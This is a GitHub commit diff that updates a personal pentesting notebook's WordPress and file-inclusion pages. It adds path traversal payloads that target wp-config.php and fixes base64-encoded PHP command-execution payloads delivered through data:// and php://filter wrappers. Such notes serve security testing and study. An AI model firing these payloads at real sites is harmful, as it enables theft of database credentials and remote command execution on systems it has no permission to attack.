Skip to content

Commit ceba022

Browse files
hdks-bughdks-bug
committed
updated
1 parent 198c741 commit ceba022

File tree

2 files changed

+19
-5
lines changed

2 files changed

+19
-5
lines changed

src/exploit/web/cms/wordpress-pentesting.md

Lines changed: 16 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -5,7 +5,7 @@ tags:
55
- CMS
66
- Web
77
refs:
8-
date: 2024-05-01
8+
date: 2025-01-30
99
draft: false
1010
---
1111

@@ -56,7 +56,7 @@ There is the meta tag for WordPress in the head tag of the HTML source code.
5656

5757
<br />
5858

59-
## Common Directories
59+
## Interesting Directories/Files
6060

6161
```sh
6262
/author/admin/
@@ -68,6 +68,7 @@ There is the meta tag for WordPress in the head tag of the HTML source code.
6868
/wp-admin/
6969
/wp-admin/admin-ajax.php
7070
/wp-admin/upload.php
71+
/wp-config.php
7172
/wp-content/
7273
/wp-content/uploads/
7374
/wp-includes/
@@ -101,6 +102,19 @@ admin:password
101102

102103
<br />
103104

105+
## Path Traversal
106+
107+
Check if the WordPress version or the plugin is vulnerable to path traversal. For example:
108+
109+
```bash
110+
/wp-content/plugins/<plugin_name>/<plugin_name>.php?someParam=../../../../wp-config.php
111+
/wp-content/plugins/<plugin_name>/<plugin_name>.php?someParam=php://filter/resource=../../../../wp-config.php
112+
/wp-content/plugins/<plugin_name>/php/<plugin_name>.php?someParam=../../../../wp-config.php
113+
/wp-content/plugins/<plugin_name>/php/<plugin_name>.php?someParam=php://filter/resource=../../../../wp-config.php
114+
```
115+
116+
<br />
117+
104118
## Reverse Shell
105119

106120
To achieve reverse shell, we need the admin credential.

src/exploit/web/security-risk/file-inclusion.md

Lines changed: 3 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -5,7 +5,7 @@ tags:
55
- Web
66
refs:
77
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
8-
date: 2024-12-12
8+
date: 2025-01-30
99
draft: false
1010
---
1111

@@ -77,8 +77,8 @@ draft: false
7777
# PHP Filter (Base64 encoding)
7878
# `PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+`: `<?php system($_GET['cmd']); ?>`
7979
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+&cmd=whoami
80-
# `AgZWNobyAiJF9HRVRbJ2NtZCddIjsgPz4`: `<?php echo system($_GET['cmd']); ?>`
81-
?page=php://filter/convert.base64-decode/resource=data://plain/text,AgZWNobyAiJF9HRVRbJ2NtZCddIjsgPz4=&cmd=whoami
80+
# `PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4=`: `<?php echo system($_GET['cmd']); ?>`
81+
?page=php://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4=&cmd=whoami
8282

8383
# PHP Session File
8484
?page=/var/lib/php/sessions/sess_<PHPSESSID>

0 commit comments

Comments
 (0)